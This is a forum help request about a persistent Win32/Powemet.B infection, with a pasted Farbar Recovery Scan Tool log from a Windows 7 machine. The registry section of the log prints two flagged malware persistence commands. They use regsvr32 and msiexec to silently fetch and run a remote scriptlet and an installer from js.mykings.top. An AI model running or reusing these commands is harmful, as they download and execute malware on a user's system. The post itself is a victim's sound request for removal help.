Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Win32/Powemet.B!attk infection causing BSOD


  • This topic is locked This topic is locked
8 replies to this topic

#1 Doxxy

Doxxy

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:08:05 PM

Posted 02 September 2017 - 09:16 PM

Good evening,

 

Several days ago, WIndows Security Essentials noticed this infection on my computer that, after being removed with the antivirus software, persists with every subsequent reboot.  Yesterday, I attempted to remove using the method outlined in the following link, but it was not successful (https://answers.microsoft.com/en-us/protect/forum/protect_defender-protect_scanning/malware-behaviorwin32powemetbattk/c97ad8e1-7554-4aaa-8238-55517108d56c?auth=1).  During this process, a forum member mentioned BleepingComputer so I have come here for assistance.

 

The only symptom I am noticing (besides the antivirus notifications) is a very occasional BSOD.

 

FRST Log:  

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-08-2017
Ran by XYZ (administrator) on XYZ-PC (02-09-2017 22:08:09)
Running from C:\Users\XYZ\Desktop
Loaded Profiles: XYZ & UpdatusUser (Available Profiles: XYZ & UpdatusUser)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\D-Link\DWA-160\ANIWConnService.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Valve Corporation) E:\Program Files\Steam\Steam.exe
(Flux Software LLC) C:\Users\XYZ\AppData\Local\FluxSoftware\Flux\flux.exe
(SteelSeries ApS) E:\Program Files\SteelSeries Engine\SteelSeriesEngine.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Razer Inc.) C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe
(DEVGURU Co., LTD.) E:\Program Files\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe
(Dropbox, Inc.) C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-160\AirNCFG.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Dropbox, Inc.) C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Dropbox, Inc.) C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Apple Inc.) E:\Program Files\iTunes\iTunesHelper.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Logitech Inc.) E:\Program Files (x86)\Logitech Webcam\LWS\Webcam Software\LWS.exe
(MagicISO, Inc.) E:\Program Files\MagicDisc\MagicDisc.exe
(Futuredial Inc.) E:\Program Files (x86)\Asus Sync\asusUPCTLoader.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Samsung Electronics Co., Ltd.) E:\Program Files\Kies\KiesTrayAgent.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Spotify Ltd) C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusionHookAppWIN6032.exe
(Binary Fortress Software) C:\Program Files (x86)\DisplayFusion\DisplayFusionHookAppWIN6064.exe
(Valve Corporation) E:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) E:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
HKLM-x32\...\Run: [D-Link D-Link Wireless N Dual Band DWA-160 ] => C:\Program Files (x86)\D-Link\DWA-160\AirNCFG.exe [1078592 2011-11-02] (D-Link Corp.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-05-21] (Intel Corporation)
HKLM-x32\...\Run: [iTunesHelper] => E:\Program Files\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [LWS] => E:\Program Files (x86)\Logitech Webcam\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)
HKLM-x32\...\Run: [RzWizard] => C:\Program Files (x86)\Razer\RzWizard\RzWizard.exe [254976 2015-07-23] (Razer Inc.)
HKLM-x32\...\Run: [ASUS Sync Loader] => E:\Program Files (x86)\Asus Sync\asusUPCTLoader.exe [638976 2012-04-20] (Futuredial Inc.)
HKLM-x32\...\Run: [KiesTrayAgent] => E:\Program Files\Kies\KiesTrayAgent.exe [318248 2016-01-08] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Steam] => E:\Program Files\Steam\steam.exe [3071776 2017-08-28] (Valve Corporation)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [f.lux] => C:\Users\XYZ\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [SteelSeries Engine] => E:\Program Files\SteelSeries Engine\SteelSeriesEngine.exe [242688 2013-11-05] (SteelSeries ApS)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Dropbox Update] => C:\Users\XYZ\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [DisplayFusion] => C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe [9161720 2016-12-23] (Binary Fortress Software)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Spotify] => C:\Users\XYZ\AppData\Roaming\Spotify\Spotify.exe [15866480 2017-08-03] (Spotify Ltd)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\Run: [Spotify Web Helper] => C:\Users\XYZ\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1580144 2017-08-03] (Spotify Ltd)
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\MountPoints2: F - F:\autorun.exe
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\MountPoints2: {3ab623ce-a82c-11e4-a6ad-60a44c624579} - F:\autorun.exe
HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\...\MountPoints2: {9abf95ad-0c65-11e3-9c98-806e6f6e6963} - D:\autorun.exe
ShellExecuteHooks: Directory Opus Shell Execute Hook - {3CF9ECE0-1A9F-11D2-8C73-00C06C2005DE} - C:\Program Files\GPSoftware\Directory Opus\dopuslib.dll [1809776 2017-03-21] (GP Software)
ShellExecuteHooks-x32: Directory Opus Shell Execute Hook - {EE761688-C137-4b04-8FAB-3C9CDF0886F0} - C:\Program Files\GPSoftware\Directory Opus\dopuslib32.dll [381296 2017-03-20] (GP Software)
Startup: C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-23]
ShortcutTarget: Dropbox.lnk -> C:\Users\XYZ\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MagicDisc.lnk [2013-09-11]
ShortcutTarget: MagicDisc.lnk -> E:\Program Files\MagicDisc\MagicDisc.exe (MagicISO, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SteelSeries Engine 3.lnk [2014-09-15]
ShortcutTarget: SteelSeries Engine 3.lnk -> C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d95afb5c-9892-41c9-a72b-9151909f8cef} <==== ATTENTION (Restriction - IP)
Tcpip\Parameters: [DhcpNameServer] 216.104.96.22 216.104.98.222
Tcpip\..\Interfaces\{4BDC28DD-5486-429A-8BD5-7EE7F535A427}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4FB55C4F-470C-4ACC-AE28-7D97B6EC0BA5}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{FE7A27F3-EA0A-4F7A-84BE-9DB5984BB7B3}: [DhcpNameServer] 216.104.96.22 216.104.98.222
 
Internet Explorer:
==================
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> E:\Program Files\Java\jre1.8.0_101\bin\ssv.dll [2016-08-11] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> E:\Program Files\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-11] (Oracle Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-03-20] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-03-20] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: nxtbh2df.default
FF ProfilePath: C:\Users\XYZ\AppData\Roaming\Mozilla\Firefox\Profiles\nxtbh2df.default [2017-09-01]
FF Extension: (Site Deployment Checker) - C:\Users\XYZ\AppData\Roaming\Mozilla\Firefox\Profiles\nxtbh2df.default\features\{11da577c-36a6-4fb7-87ea-c439e9e69f3d}\deployment-checker@mozilla.org.xpi [2017-04-01]
FF Plugin: @java.com/DTPlugin,version=11.101.2 -> E:\Program Files\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.101.2 -> E:\Program Files\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-11] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> E:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-03-20] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-03-20] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-04-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-04-29] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.6\npGoogleUpdate3.dll [2017-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.6\npGoogleUpdate3.dll [2017-07-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> E:\Program Files\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> E:\Program Files\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-08-10] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1331985295-2685822398-3683760129-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\XYZ\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-10-03] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1331985295-2685822398-3683760129-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2016-08-24] ()
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR StartupUrls: Default -> "hxxp://google.ca/","hxxps://webmail.snolab.ca/","hxxps://www.snolab.ca/shift/TWiki/bin/login/Main/WebHome?origurl=/shift/TWiki/bin/view","hxxps://www.snolab.ca/docushare/dsweb/HomePage","hxxps://hr.snolab.ca/selfservice/","hxxps://procurement.snolab.ca/ReQlogic/Login.aspx"
CHR NewTab: Default ->  Not-active:"chrome-extension://laookkfknpbbblfpciffpaejjkokdgca/dashboard.html"
CHR DefaultSearchKeyword: Default -> lp
CHR Profile: C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default [2017-09-02]
CHR Extension: (Google Docs) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-03]
CHR Extension: (Google Drive) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-20]
CHR Extension: (YouTube) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Cast) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2017-01-25]
CHR Extension: (uBlock Origin) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-07-21]
CHR Extension: (Google Search) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Adobe Acrobat) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-06-08]
CHR Extension: (Google Docs Offline) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-17]
CHR Extension: (Hover Free) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcmnnggnaofmhflgomfjfbndngdoogkj [2013-08-23]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-08-30]
CHR Extension: (Lone Tree) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\hfmkllfplegemejikoabfpjdaoncphip [2017-09-01]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2017-07-30]
CHR Extension: (Momentum) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\laookkfknpbbblfpciffpaejjkokdgca [2017-08-25]
CHR Extension: (Google Dictionary (by Google)) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgijmajocgfcbeboacabfgobmjgjcoja [2017-07-23]
CHR Extension: (Google Mail Checker) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihcahmgecmbnbcchbopgniflfhgnkff [2013-08-23]
CHR Extension: (Ghostery) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\mlomiejdfkolichcflejclcbmpeaniij [2017-08-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (uMatrix) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\ogfcmafjalglgifnmanfmnieipoejdcf [2017-04-10]
CHR Extension: (Gmail) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR Extension: (Chrome Media Router) - C:\Users\XYZ\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-08]
CHR HKU\S-1-5-21-1331985295-2685822398-3683760129-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 D-Link Wireless N Dual Band DWA-160 _WPS; C:\Program Files (x86)\D-Link\DWA-160\ANIWConnService.exe [53248 2010-07-12] () [File not signed]
S3 DAUpdaterSvc; E:\Program Files\Steam\steamapps\common\Dragon Age Origins\bin_ship\DAUpdaterSvc.Service.exe [25832 2015-04-17] (BioWare)
R2 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [5098008 2016-12-23] (Binary Fortress Software)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-06-25] (Intel Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2016-08-24] ()
R2 RzWizardService; C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe [368128 2015-07-23] (Razer Inc.) [File not signed]
R2 ss_conn_service; E:\Program Files\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (DEVGURU Co., LTD.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2010-05-29] ()
R1 epp; C:\EEK\bin64\epp.sys [124552 2016-11-23] (Emsisoft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R1 MpKsl2b58743b; C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{F3220B1B-A48A-42F1-94A9-12E136886E9E}\MpKsl2b58743b.sys [44928 2017-09-02] (Microsoft Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1660480 2011-09-09] (Ralink Technology Corp.)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 RTL8192cu; C:\Windows\System32\DRIVERS\RTL8192cu.sys [926824 2013-03-12] (Realtek Semiconductor Corporation )
S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52592 2016-02-17] (Cisco Systems, Inc.)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-01 22:23 - 2017-09-01 22:23 - 000000000 ____D C:\Users\XYZ\AppData\Local\ESET
2017-09-01 18:50 - 2017-09-01 18:50 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\3909
2017-09-01 18:50 - 2017-09-01 18:50 - 000000000 ____D C:\ProgramData\Emsisoft
2017-09-01 18:47 - 2017-09-02 00:34 - 000000000 ____D C:\EEK
2017-09-01 18:45 - 2017-09-01 18:48 - 000000000 ____D C:\AdwCleaner
2017-09-01 18:44 - 2017-09-01 18:44 - 000002458 _____ C:\Users\XYZ\Desktop\JRT.txt
2017-09-01 18:42 - 2017-09-01 18:42 - 000001938 _____ C:\Users\XYZ\Desktop\Rkill.txt
2017-09-01 18:22 - 2017-09-01 18:22 - 000003168 _____ C:\Users\XYZ\Desktop\Search.txt
2017-09-01 18:12 - 2017-09-01 18:13 - 000029785 _____ C:\Users\XYZ\Desktop\fixlist.txt
2017-09-01 18:10 - 2017-09-02 22:08 - 000022498 _____ C:\Users\XYZ\Desktop\FRST.txt
2017-09-01 18:10 - 2017-09-01 18:13 - 000113837 _____ C:\Users\XYZ\Desktop\Addition.txt
2017-09-01 18:10 - 2017-09-01 17:49 - 002395648 _____ (Farbar) C:\Users\XYZ\Desktop\FRST64.exe
2017-09-01 17:50 - 2017-09-02 22:08 - 000000000 ____D C:\FRST
2017-08-23 20:40 - 2017-08-23 20:40 - 000001158 _____ C:\Users\XYZ\Desktop\Fallout 4 (F4SE).lnk
2017-08-23 17:06 - 2017-08-23 17:06 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-21 16:33 - 2017-08-23 18:53 - 000000502 _____ C:\Users\XYZ\Desktop\FO4 mod progress.txt
2017-08-21 16:03 - 2017-08-21 16:03 - 000000980 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LOOT.lnk
2017-08-21 16:03 - 2017-08-21 16:03 - 000000000 ____D C:\Program Files (x86)\LOOT
2017-08-21 15:40 - 2017-08-21 15:40 - 000000000 ____D C:\Users\XYZ\AppData\Local\Bilago
2017-08-21 15:20 - 2017-08-21 15:20 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\F4SE
2017-08-17 16:35 - 2017-08-17 16:35 - 000083573 _____ C:\Users\XYZ\Desktop\JK-TK.pdf
2017-08-16 22:11 - 2017-08-16 22:11 - 000000773 _____ C:\Users\Public\Desktop\Nexus Mod Manager.lnk
2017-08-16 22:11 - 2017-08-16 22:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager
2017-08-03 15:50 - 2017-09-02 20:35 - 000003010 _____ C:\Windows\System32\Tasks\MSIAfterburner
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-02 22:05 - 2014-12-31 16:54 - 000000000 ____D C:\Users\XYZ\AppData\Roaming\Spotify
2017-09-02 21:38 - 2015-06-18 22:11 - 000000918 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1331985295-2685822398-3683760129-1000UA.job
2017-09-02 20:42 - 2009-07-14 00:45 - 000029120 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-09-02 20:42 - 2009-07-14 00:45 - 000029120 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-09-02 20:40 - 2009-07-14 01:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2017-09-02 20:40 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\inf
